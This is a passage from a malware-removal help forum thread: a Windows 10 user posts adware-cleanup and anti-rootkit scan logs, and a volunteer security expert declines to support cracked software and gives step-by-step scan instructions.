    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
    [-] Key Deleted : HKCU\Software\ICSW1.17
    [-] Key Deleted : HKCU\Software\powerpack
    [-] Key Deleted : HKCU\Software\PRODUCTSETUP
    [-] Key Deleted : HKCU\Software\TornTv Downloader
    [-] Key Deleted : HKLM\SOFTWARE\mystartsearchSoftware
    [-] Key Deleted : HKLM\SOFTWARE\SPPDCOM
    [-] Key Deleted : [x64] HKLM\SOFTWARE\AppVerifierService
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa} [NameServer]
    [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\nps.pastaleads.com
    [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\pastaleads.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\chrome-64-bit.en.softonic.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\nps.pastaleads.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pastaleads.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\softonic.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\chrome-64-bit.en.softonic.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nps.pastaleads.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pastaleads.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\softonic.com

    ***** [ Web browsers ] *****

    [-] [C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : booedmolknjekdopkepjjeckmjkdpfgl
    [-] [C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : flpcjncodpafbgdpnkljologafpionhb

    *************************

    :: "Tracing" keys removed
    :: Winsock settings cleared

    *************************

    C:\AdwCleaner\AdwCleaner[C1].txt - [5290 bytes] - [01/03/2016 12:31:36]
    C:\AdwCleaner\AdwCleaner[S1].txt - [5161 bytes] - [01/03/2016 12:27:52]

    ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [5436 bytes] ##########

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.0.3 (02.09.2016)
    Operating System: Windows 10 Home x64
    Ran by Kym (Administrator) on 01-03-16 at 12:35:19.03
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




    File System: 4

    Successfully deleted: C:\ai_recyclebin (Folder)
    Successfully deleted: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage-journal (File)
    Successfully deleted: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage (File)
    Successfully deleted: C:\Users\Kym\AppData\Roaming\speedrunnerslog.txt (File)



    Registry: 0





    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 01-03-16 at 12:36:57.23
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    CKScanner 2.5 - Additional Security Risks - These are not necessarily bad
    c:\windows\autokms\autokms.exe
    scanner sequence 3.AP.11.PANARZ
    ----- EOF -----

    Malwarebytes Anti-Malware
    www.malwarebytes.org

    Scan Date: 01-03-16
    Scan Time: 12:43 PM
    Logfile:
    Administrator: Yes

    Version: 2.2.0.1024
    Malware Database: v2016.02.29.05
    Rootkit Database: v2016.02.27.01
    License: Free
    Malware Protection: Disabled
    Malicious Website Protection: Disabled
    Self-protection: Disabled

    OS: Windows 10
    CPU: x64
    File System: NTFS
    User: Kym

    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 375123
    Time Elapsed: 3 min, 50 sec

    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    Processes: 0
    (No malicious items detected)

    Modules: 0
    (No malicious items detected)

    Registry Keys: 13
    PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.AdvancedPCCare, HKLM\SOFTWARE\MICROSOFT\TRACING\advancedpccare_RASAPI32, Quarantined, [a0d9b3b3fd9ce056981b6be312f22fd1],
    PUP.Optional.AdvancedPCCare, HKLM\SOFTWARE\MICROSOFT\TRACING\advancedpccare_RASMANCS, Quarantined, [3742264028713df953602a24798ba65a],
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR , Quarantined, [b7c29fc762372b0b875778a3e71d8b75],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}, Quarantined, [7207c79f6b2e1e18b00668f612f27a86],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{cf2797aa-b7ec-e311-8ed9-005056c00008}, Quarantined, [5c1d73f31e7b64d2d0e780de3dc71be5],
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\PCV-VARS, Quarantined, [9bdeb5b10792b284f106095a0004f30d],
    PUP.Optional.WindowsMangerProtect, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\WindowsMangerProtect, Quarantined, [5b1ee97d21782c0a9a4232eebd470000],

    Registry Values: 6
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [7ffaa6c01b7eee48a03d79a254b034cc]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [4c2d2a3ce4b572c436a79c7f07fdc937]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [5f1a94d2c1d86fc722bbd8438b79bf41]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\iexplore.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [a3d61056ff9a5adccd10be5d877d35cb]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [b7c29fc762372b0b875778a3e71d8b75]
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\PCV-VARS|affiliateid, Quarantined, [9bdeb5b10792b284f106095a0004f30d],

    Registry Data: 1
    Trojan.DNSChanger.DNSRst, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, 82.163.143.171 82.163.142.173, Good: (8.8.8.8), Bad: (82.163.143.171 82.163.142.173),Replaced,[48311e48d6c36ec8783ac13f1fe6cc34]

    Folders: 0
    (No malicious items detected)

    Files: 8
    PUP.Optional.BestPriceNinja, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage, Quarantined, [f1886cfa9504d462b6818ad9c24243bd],
    PUP.Optional.BestPriceNinja, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage-journal, Quarantined, [75048adcdbbe48ee092e70f312f2e41c],
    PUP.Optional.eShopComp, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.eshopcomp.com_0.localstorage, Quarantined, [54251a4c8a0f4fe75ac485e3de26f60a],
    PUP.Optional.eShopComp, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.eshopcomp.com_0.localstorage-journal, Quarantined, [b3c60b5b09901224f12d3a2e3cc88f71],
    PUP.Optional.CrossRider, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Quarantined, [cdacabbb930658dee19ce08bd430bc44],
    PUP.Optional.CrossRider, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, Quarantined, [1564283e1b7e3bfb4c3157149e66a15f],
    PUP.Optional.UTop, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_utop.it_0.localstorage, Quarantined, [a5d4283e1c7da591102e0f652dd7c63a],
    PUP.Optional.UTop, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_utop.it_0.localstorage-journal, Quarantined, [1e5b5e0829708caaaf8f660e867eb14f],

    Physical Sectors: 0
    (No malicious items detected)


    (end)

  7. #7
    Security Expert Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    3,818

    Default

    c:\windows\autokms\autokms.exe
    The above file can be related to a cracked version of Windows or Microsoft office.
    Is your version legit?

    Tell me what your computer is doing now?
    Windows Insider MVP Consumer Security 2009 - 2017
    Please do not PM me for Malware help, we all benefit from posting on the open board.

  8. #8
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Default Windows 10

    My version isn't legit, i used a cracked version. However i do have a legit windows 7 CD and serial if you think i should reinstall?

    Some websites are fine, but others are constantly spammed by ads. Would you like me to send a screenshot?

  9. #9
    Security Expert Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    3,818

    Default

    We do not support the use of Pirated-Warez-Keygens-Cracked software.

    If seeking help in our Malware removal forum please know that users who have programs obtained by such methods will be asked to remove them, since our help could otherwise be seen as aiding copyright violations. In doing the crack, the 'cracker' has broken the 'End User License Agreement' (EULA) of the product.

    You will need to remove your cracked version of Microsoft office.

    ~~~~~~~~~~~~~~~~~~~~

    Malwarebytes Anti-Rootkit
    • Download Malwarebytes Anti-Rootkit
    • Once the file has been downloaded, right click on the downloaded file and select the Extract all menu option.
    • Follow the instructions to extract the ZIP file to a folder called mbar-versionnumber on your desktop.
    • Once the ZIP file has been extracted, open the folder and when that folder opens, double-click on the mbar folder.
    • Double-click on the mbar.exe file to launch Malwarebytes Anti-Rootkit.
    • After you double-click on the mbar.exe file, you may receive a User Account Control (UAC) message if you are sure you wish to allow the program to run. Please allow to start Malwarebytes Anti-Rootkit correctly.
    • Malwarebytes Anti-Rootkit will now install necessary drivers that are required for the program to operate correctly.
    • If you receive a DDA driver message like could not load DDA driver, click on the Yes button and Malwarebytes Anti-Rootkit will now restart your computer and will start automatically.



    • Please click by the introduction screen on the Next button to continue.




    • Next you will see the Update Database screen.
    • Click on the Update button so Malwarebytes Anti-Rootkit can download the latest definition updates.




    • When the update has finished, click on the Next button.



    • Next you can select some basic scanning options. Make sure the Drivers, Sectors, and System scan targets are selected before you click on the Scan button.
    • Malwarebytes Anti-Rootkit will now start scanning your computer for rootkits. This scan can take some time, so please be patient.




    • When the scan with Malwarebytes Anti-Rootkit is finished, the program will display a screen with the results from the scan.
    • Make sure everything is selected and that the option to create a restore point is checked.
    • Next click on the Cleanup button. Malwarebytes Anti-Rootkit will then prompt you to reboot your computer.
    • Click on Yes button to restart your computer.

    • There will now be two log files created in the mbar folder called system-log.txt and one that starts with mbar-log.
    • The mbar-log file will always start with mbar-log, but the rest will be named using a timestamp indicating the time it was run.
      • For example, mbar-log-2012-11-12 (19-13-32).txt corresponds to mbar-log-year-month-day (hour-minute-second).txt.

    • The system-log.txt contains information about each time you have run MBAR and contains diagnostic information from the program.


    ~~~~~~~~~~~

    I need to see a fresh run of Farbar Recovery Scan Tool.

    • Right-Click FRST.exe / FRST64.exe and select Run as administrator to run the programme.
    • Click Yes to the disclaimer.
    • Ensure the Addition.txt box is checked.
    • Click the Scan button and let the programme run.
    • Upon completion, click OK, then OK on the Addition.txt pop up screen.
    • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply.
    Windows Insider MVP Consumer Security 2009 - 2017
    Please do not PM me for Malware help, we all benefit from posting on the open board.

  10. #10
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Default System-log, Mbar-log, FRST, Addition

    The Malwarebytes Anti-Rootkit finished the scan and said "Scan Finished: No malware found!".

    Malwarebytes Anti-Rootkit BETA 1.9.3.1001
    www.malwarebytes.org

    Database version:
    main: v2016.03.01.04
    rootkit: v2016.02.27.01

    Windows 10 x64 NTFS
    Internet Explorer 11.0.10240.16683
    Kym :: KYM-PC [administrator]

    01-03-16 9:58:00 PM
    mbar-log-2016-03-01 (21-58-00).txt

    Scan type: Quick scan
    Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
    Scan options disabled:
    Objects scanned: 392185
    Time elapsed: 10 minute(s), 43 second(s)

    Memory Processes Detected: 0
    (No malicious items detected)

    Memory Modules Detected: 0
    (No malicious items detected)

    Registry Keys Detected: 0
    (No malicious items detected)

    Registry Values Detected: 0
    (No malicious items detected)

    Registry Data Items Detected: 0
    (No malicious items detected)

    Folders Detected: 0
    (No malicious items detected)

    Files Detected: 0
    (No malicious items detected)

    Physical Sectors Detected: 0
    (No malicious items detected)

    (end)

    ---------------------------------------
    Malwarebytes Anti-Rootkit BETA 1.09.3.1001

    (c) Malwarebytes Corporation 2011-2012

    OS version: 10.0.9200 Windows 10 x64

    Account is Administrative

    Internet Explorer version: 11.0.10240.16683

    File system is: NTFS
    Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED, F:\ DRIVE_FIXED
    CPU speed: 3.392000 GHz
    Memory total: 17061519360, free: 14123868160

    Downloaded database version: v2016.03.01.04
    Downloaded database version: v2016.02.27.01
    Downloaded database version: v2016.02.22.02
    =======================================
    Initializing...
    Driver version: 0.3.0.4
    ------------ Kernel report ------------
    03/01/2016 21:57:55
    ------------ Loaded modules -----------
    \SystemRoot\system32\ntoskrnl.exe
    \SystemRoot\system32\hal.dll
    \SystemRoot\system32\kd.dll
    \SystemRoot\system32\mcupdate_GenuineIntel.dll
    \SystemRoot\System32\drivers\werkernel.sys
    \SystemRoot\System32\drivers\CLFS.SYS
    \SystemRoot\System32\drivers\tm.sys
    \SystemRoot\system32\PSHED.dll
    \SystemRoot\system32\BOOTVID.dll
    \SystemRoot\System32\drivers\cmimcext.sys
    \SystemRoot\System32\drivers\ntosext.sys
    \SystemRoot\system32\CI.dll
    \SystemRoot\System32\drivers\msrpc.sys
    \SystemRoot\System32\drivers\FLTMGR.SYS
    \SystemRoot\System32\drivers\ksecdd.sys
    \SystemRoot\System32\drivers\clipsp.sys
    \SystemRoot\system32\drivers\Wdf01000.sys
    \SystemRoot\system32\drivers\WDFLDR.SYS
    \SystemRoot\System32\Drivers\acpiex.sys
    \SystemRoot\System32\Drivers\WppRecorder.sys
    \SystemRoot\System32\Drivers\cng.sys
    \SystemRoot\System32\drivers\ACPI.sys
    \SystemRoot\System32\drivers\WMILIB.SYS
    \SystemRoot\system32\drivers\WindowsTrustedRT.sys
    \SystemRoot\System32\drivers\WindowsTrustedRTProxy.sys
    \SystemRoot\System32\drivers\pcw.sys
    \SystemRoot\System32\drivers\dvpmielc.sys
    \SystemRoot\System32\drivers\msisadrv.sys
    \SystemRoot\System32\drivers\pci.sys
    \SystemRoot\System32\drivers\vdrvroot.sys
    \SystemRoot\system32\drivers\pdc.sys
    \SystemRoot\system32\drivers\CEA.sys
    \SystemRoot\System32\drivers\partmgr.sys
    \SystemRoot\System32\drivers\spaceport.sys
    \SystemRoot\System32\drivers\volmgr.sys
    \SystemRoot\System32\drivers\volmgrx.sys
    \SystemRoot\System32\drivers\mountmgr.sys
    \SystemRoot\System32\drivers\iaStorA.sys
    \SystemRoot\System32\drivers\storport.sys
    \SystemRoot\System32\drivers\fileinfo.sys
    \SystemRoot\System32\Drivers\Wof.sys
    \SystemRoot\System32\Drivers\PxHlpa64.sys
    \SystemRoot\System32\Drivers\NTFS.sys
    \SystemRoot\System32\Drivers\Fs_Rec.sys
    \SystemRoot\system32\drivers\ndis.sys
    \SystemRoot\system32\drivers\NETIO.SYS
    \SystemRoot\System32\Drivers\ksecpkg.sys
    \SystemRoot\System32\drivers\tcpip.sys
    \SystemRoot\System32\drivers\fwpkclnt.sys
    \SystemRoot\System32\drivers\wfplwfs.sys
    \SystemRoot\System32\DRIVERS\fvevol.sys
    \SystemRoot\System32\drivers\volsnap.sys
    \SystemRoot\System32\drivers\rdyboost.sys
    \SystemRoot\System32\Drivers\mup.sys
    \SystemRoot\System32\drivers\disk.sys
    \SystemRoot\System32\drivers\CLASSPNP.SYS
    \SystemRoot\System32\Drivers\aswVmm.sys
    \SystemRoot\System32\Drivers\aswRvrt.sys
    \SystemRoot\System32\Drivers\crashdmp.sys
    \SystemRoot\System32\drivers\cdrom.sys
    \SystemRoot\system32\drivers\filecrypt.sys
    \SystemRoot\system32\drivers\tbs.sys
    \SystemRoot\system32\drivers\aswSP.sys
    \SystemRoot\System32\Drivers\Null.SYS
    \SystemRoot\System32\Drivers\Beep.SYS
    \SystemRoot\System32\drivers\BasicDisplay.sys
    \SystemRoot\System32\drivers\watchdog.sys
    \SystemRoot\System32\drivers\dxgkrnl.sys
    \SystemRoot\System32\drivers\BasicRender.sys
    \SystemRoot\System32\Drivers\Npfs.SYS
    \SystemRoot\System32\Drivers\Msfs.SYS
    \SystemRoot\system32\DRIVERS\tdx.sys
    \SystemRoot\system32\DRIVERS\TDI.SYS
    \SystemRoot\System32\DRIVERS\netbt.sys
    \SystemRoot\system32\drivers\aswRdr2.sys
    \SystemRoot\system32\drivers\afd.sys
    \SystemRoot\System32\drivers\vwififlt.sys
    \SystemRoot\System32\drivers\pacer.sys
    \SystemRoot\system32\drivers\netbios.sys
    \SystemRoot\system32\DRIVERS\rdbss.sys
    \SystemRoot\system32\drivers\nsiproxy.sys
    \SystemRoot\System32\drivers\npsvctrig.sys
    \SystemRoot\System32\drivers\mssmbios.sys
    \SystemRoot\System32\drivers\gpuenergydrv.sys
    \SystemRoot\System32\Drivers\dfsc.sys
    \SystemRoot\system32\DRIVERS\AppleCharger.sys
    \SystemRoot\system32\DRIVERS\ahcache.sys
    \SystemRoot\System32\DriverStore\FileRepository\compositebus.inf_amd64_98334ba6e76853ba\CompositeBus.sys
    \SystemRoot\System32\drivers\kdnic.sys
    \SystemRoot\System32\drivers\umbus.sys
    \SystemRoot\system32\DRIVERS\atikmpag.sys
    \SystemRoot\system32\DRIVERS\atikmdag.sys
    \SystemRoot\System32\drivers\HDAudBus.sys
    \SystemRoot\System32\drivers\portcls.sys
    \SystemRoot\System32\drivers\drmk.sys
    \SystemRoot\System32\drivers\ks.sys
    \SystemRoot\system32\DRIVERS\igdkmd64.sys
    \SystemRoot\System32\drivers\USBXHCI.SYS
    \SystemRoot\system32\drivers\ucx01000.sys
    \SystemRoot\system32\DRIVERS\TeeDriverx64.sys
    \SystemRoot\System32\drivers\usbehci.sys
    \SystemRoot\System32\drivers\USBPORT.SYS
    \SystemRoot\System32\drivers\rt640x64.sys
    \SystemRoot\System32\drivers\serial.sys
    \SystemRoot\System32\drivers\serenum.sys
    \SystemRoot\System32\drivers\parport.sys
    \SystemRoot\system32\DRIVERS\GEARAspiWDM.sys
    \SystemRoot\System32\drivers\intelppm.sys
    \SystemRoot\System32\drivers\XtuAcpiDriver.sys
    \SystemRoot\system32\DRIVERS\serscan.sys
    \SystemRoot\system32\drivers\ksthunk.sys
    \SystemRoot\System32\drivers\NdisVirtualBus.sys
    \SystemRoot\System32\DriverStore\FileRepository\swenum.inf_amd64_2a699e44676b7781\swenum.sys
    \SystemRoot\system32\drivers\LGBusEnum.sys
    \SystemRoot\system32\drivers\LGJoyXlCore.sys
    \SystemRoot\System32\drivers\rdpbus.sys
    \SystemRoot\System32\drivers\usbhub.sys
    \SystemRoot\System32\drivers\USBD.SYS
    \SystemRoot\system32\drivers\AtihdWT6.sys
    \SystemRoot\system32\DRIVERS\IntcDAud.sys
    \SystemRoot\System32\drivers\UsbHub3.sys
    \SystemRoot\system32\drivers\RTKVHD64.sys
    \SystemRoot\System32\drivers\USBSTOR.SYS
    \SystemRoot\System32\drivers\usbccgp.sys
    \SystemRoot\System32\drivers\rzmpos.sys
    \SystemRoot\System32\drivers\hidusb.sys
    \SystemRoot\System32\drivers\HIDCLASS.SYS
    \SystemRoot\System32\drivers\HIDPARSE.SYS
    \SystemRoot\system32\drivers\usbaudio.sys
    \SystemRoot\System32\drivers\mouhid.sys
    \SystemRoot\System32\drivers\rzudd.sys
    \SystemRoot\System32\drivers\mouclass.sys
    \SystemRoot\System32\drivers\kbdhid.sys
    \SystemRoot\System32\drivers\kbdclass.sys
    \SystemRoot\System32\win32k.sys
    \SystemRoot\System32\win32kfull.sys
    \SystemRoot\System32\win32kbase.sys
    \SystemRoot\System32\Drivers\dump_diskdump.sys
    \SystemRoot\System32\Drivers\dump_iaStorA.sys
    \SystemRoot\System32\Drivers\dump_dumpfve.sys
    \SystemRoot\System32\drivers\dxgmms2.sys
    \SystemRoot\System32\drivers\monitor.sys
    \SystemRoot\System32\TSDDD.dll
    \SystemRoot\System32\ATMFD.DLL
    \SystemRoot\System32\cdd.dll
    \SystemRoot\system32\drivers\luafv.sys
    \SystemRoot\system32\drivers\storqosflt.sys
    \SystemRoot\system32\drivers\aswMonFlt.sys
    \SystemRoot\system32\drivers\WudfPf.sys
    \SystemRoot\system32\DRIVERS\WUDFRd.sys
    \SystemRoot\System32\drivers\WpdUpFltr.sys
    \SystemRoot\system32\drivers\lltdio.sys
    \SystemRoot\system32\drivers\mslldp.sys
    \SystemRoot\system32\drivers\aswStm.sys
    \SystemRoot\system32\drivers\rspndr.sys
    \SystemRoot\system32\drivers\mmcss.sys
    \SystemRoot\System32\drivers\condrv.sys
    \SystemRoot\system32\drivers\HTTP.sys
    \SystemRoot\system32\DRIVERS\bowser.sys
    \SystemRoot\system32\DRIVERS\mrxsmb.sys
    \SystemRoot\system32\DRIVERS\mrxsmb20.sys
    \SystemRoot\System32\drivers\mpsdrv.sys
    \SystemRoot\system32\drivers\aswHwid.sys
    \SystemRoot\System32\DRIVERS\srvnet.sys
    \??\C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys
    \SystemRoot\System32\DRIVERS\srv2.sys
    \??\C:\Windows\system32\drivers\LMIRfsDriver.sys
    \??\C:\WINDOWS\system32\drivers\mbam.sys
    \SystemRoot\system32\drivers\Ndu.sys
    \SystemRoot\system32\drivers\mqac.sys
    \SystemRoot\system32\drivers\peauth.sys
    \??\C:\WINDOWS\system32\drivers\rzpmgrk.sys
    \SystemRoot\system32\DRIVERS\mrxsmb10.sys
    \??\C:\WINDOWS\system32\drivers\rzpnk.sys
    \SystemRoot\System32\DRIVERS\srv.sys
    \SystemRoot\System32\drivers\tcpipreg.sys
    \??\C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys
    \SystemRoot\System32\drivers\tunnel.sys
    \SystemRoot\system32\drivers\LGVirHid.sys
    \??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
    \??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
    ----------- End -----------
    Done!

    Scan started
    Database versions:
    main: v2016.03.01.04
    rootkit: v2016.02.27.01

    <<<2>>>
    Physical Sector Size: 512
    Drive: 1, DevicePointer: 0xffffe0001f007060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
    --------- Disk Stack ------
    DevicePointer: 0xffffe0001f008300, DeviceName: Unknown, DriverName: \Driver\partmgr\
    DevicePointer: 0xffffe0001f007060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
    DevicePointer: 0xffffe0001ca1e690, DeviceName: Unknown, DriverName: \Driver\ACPI\
    DevicePointer: 0xffffe0001ca23040, DeviceName: Unknown, DriverName: \Driver\ACPI\
    DevicePointer: 0xffffe0001ca22060, DeviceName: \Device\00000030\, DriverName: \Driver\iaStorA\
    ------------ End ----------
    Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
    Upper DeviceData: 0x0, 0x0, 0x0
    Lower DeviceData: 0x0, 0x0, 0x0
    <<<3>>>
    Volume: C:
    File system type: NTFS
    SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
    <<<2>>>
    <<<3>>>
    Volume: C:
    File system type: NTFS
    SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
    Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
    Done!
    Physical Sector Size: 512
    Drive: 0, DevicePointer: 0xffffe0001f009060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
    --------- Disk Stack ------
    DevicePointer: 0xffffe0001f009b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
    DevicePointer: 0xffffe0001f009060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
    DevicePointer: 0xffffe0001ca1ae40, DeviceName: Unknown, DriverName: \Driver\ACPI\
    DevicePointer: 0xffffe0001ca23760, DeviceName: Unknown, DriverName: \Driver\ACPI\
    DevicePointer: 0xffffe0001ca26060, DeviceName: \Device\0000002f\, DriverName: \Driver\iaStorA\
    ------------ End ----------
    Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
    Upper DeviceData: 0x0, 0x0, 0x0
    Lower DeviceData: 0x0, 0x0, 0x0
    Drive 0
    Scanning MBR on drive 0...
    Inspecting partition table:
    MBR Signature: 55AA
    Disk Signature: 4E0A8E17

    Partition information:

    Partition 0 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 206848 Numsec = 1953312768
    Partition is not bootable
    Partition file system is NTFS

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
